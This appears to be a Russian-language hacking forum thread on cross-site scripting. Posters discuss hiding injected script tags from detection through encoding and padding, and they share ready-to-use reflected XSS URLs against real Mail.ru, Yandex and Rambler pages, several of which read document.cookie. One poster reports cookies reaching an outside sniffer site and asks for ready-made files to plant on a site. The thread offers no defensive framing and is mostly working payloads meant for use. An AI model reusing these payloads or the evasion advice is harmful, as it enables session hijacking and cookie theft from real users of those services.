Я думаю нужно как то обходить этого стукача-отлавливателя.....иначе неодна xss непродержится долгл..даже если одни запрос или отчёт пришёл что на такой то такой то странице был замечен <script></script> то всё уже...
ни в коем случае не отправлять открытым текстом, закодировать ессесена, табуляций навтыкать, проблема только в том что написание скрипта который избавиться от всего этого мусора не составляет труда, и поэтому если уж они таким образом что-то отлавливают, то должно быть это сделано положенным образом...
Постараюсь как можно короче!.... Кто знает тот поймёт! http://top.mail.ru/stat/index.php?url="><script>alert(document.cookie)</script>
XSS на Яндексе, можеет кому-нибудь пригодиться...: Code: http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E И еше на Рамблере: Code: http://vision.rambler.ru/actions/piece.html?album=1%22%3E%3Cscript%3Ealert()%3C/script%3E
Ток что нашол http://foto.rambler.ru/topics/7316410/date/?p=15"><script>alert(document.cookie)</script>
у меня беда. все сделал правильно. тестировал работает или нет, все нормально пришло на снифер http://na-s.ru и все после этого уже больше не сливало нечего на снифер, пишет база пуста и все, как исправить?? мб из-за браузера??
НЕ а почему первый раз получилось и все больше не проходит?? Залейте плз уже готовые файлы, которые надо добавлять на сайт. мб я чето не так делаю
